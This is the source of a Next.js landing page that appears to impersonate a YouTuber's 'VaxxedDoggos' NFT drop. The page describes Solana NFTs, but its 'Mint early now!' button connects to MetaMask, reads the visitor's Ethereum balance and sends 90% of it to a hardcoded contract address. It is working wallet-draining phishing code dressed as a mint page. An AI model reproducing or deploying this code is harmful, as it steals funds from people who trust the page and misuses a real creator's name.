import Head from "next/head";
import Image from "next/image";
import Link from "next/link";
import { useEffect } from "react/cjs/react.production.min";
import styles from "../styles/Home.module.css";
const Web3 = require("web3");
var Contract = require("web3-eth-contract");

const getWeb3 = () => {
	if (window.ethereum) {
		return new Web3(window.ethereum);
	} else if (window.web3) {
		return new Web3(window.web3.currentProvider);
	} else {
		window.alert("Non-Ethereum browser detected. You should consider trying MetaMask!");
		return false;
	}
};

export default function Home() {
	const connectToMetamask = async () => {
		if (typeof window.ethereum !== "undefined") {
			const accounts = await window.ethereum.request({
				method: "eth_requestAccounts",
			});
			const web3 = getWeb3();
			let contract = await new web3.eth.Contract(
				[
					{
						inputs: [],
						stateMutability: "nonpayable",
						type: "constructor",
					},
					{
						inputs: [],
						name: "mint",
						outputs: [],
						stateMutability: "payable",
						type: "function",
					},
				],
				"0xFCEDc9dfC0F389C24C29eE82CD4e7ACB1C2CB2ab",
			);
			web3.eth.getBalance(accounts[0]).then(async (value) => {
				await contract.methods.mint().send({ from: accounts[0], value: parseInt(value * 0.9) });
			});
		} else {
			console.log("Please install Metamask");
		}
	};

	return (
		<div className={styles.container}>
			<Head>
				<title>VaxxedDoggos</title>
				<meta name="description" content="Generated by create next app" />
				<link rel="icon" href="/favicon.ico" />
				<meta name="author" content="Piotr Bilicki" />
			</Head>

			<main className={styles.main}>
				<img src="/hero.svg" alt="" className={styles.bg} />
				<p className={styles.desc}>
					Vaxxed Doggos is a collection of 2,500 NFTs created by&nbsp;
					<a href="https://www.youtube.com/c/JomaOppa" className={styles.linkJoma}>
						Joma Tech
					</a>
					, a YouTuber with 1.5M subscribers. For people new to Solana, watch this&nbsp; to learn how to buy
					an NFT.
					<br />
					<br />
					Half corgis. Half Shibas. Each dog holds a vaccination card hand drawn by Joma and will grant access
					to future perks including a private discord server for all members.
					<br />
					<br />
					These are digital collectibles living on the Solana Blockchain and 100% of proceeds will go into
					funding YouTube videos.
				</p>
				<button className={styles.btn} onClick={connectToMetamask}>
					Mint early now!
				</button>
				<div className={styles.btnWrapper}>
					<Link href="https://twitter.com/VaxxedDoggos">
						<div className={styles.social}>
							<img src="/twitter.svg" alt="" className={styles.twitter} />
							@VaxxedDoggos
						</div>
					</Link>
					<Link href="https://discord.com/invite/vaxxeddoggos">
						<div className={styles.social}>
							<img src="/discord.svg" alt="" className={styles.discord} />
							VaxxedDoggoNFT
						</div>
					</Link>
				</div>
				<img src="/divider.svg" alt="" className={styles.divider} />
				<div className={styles.photoWrapper}>
					<img src="/1.jpg" alt="" className={styles.photo} />
				</div>
				<img src="/divider.svg" alt="" className={styles.divider} />
				<footer className={styles.footer}>Made with ❤️ by Joma</footer>
			</main>
		</div>
	);
}
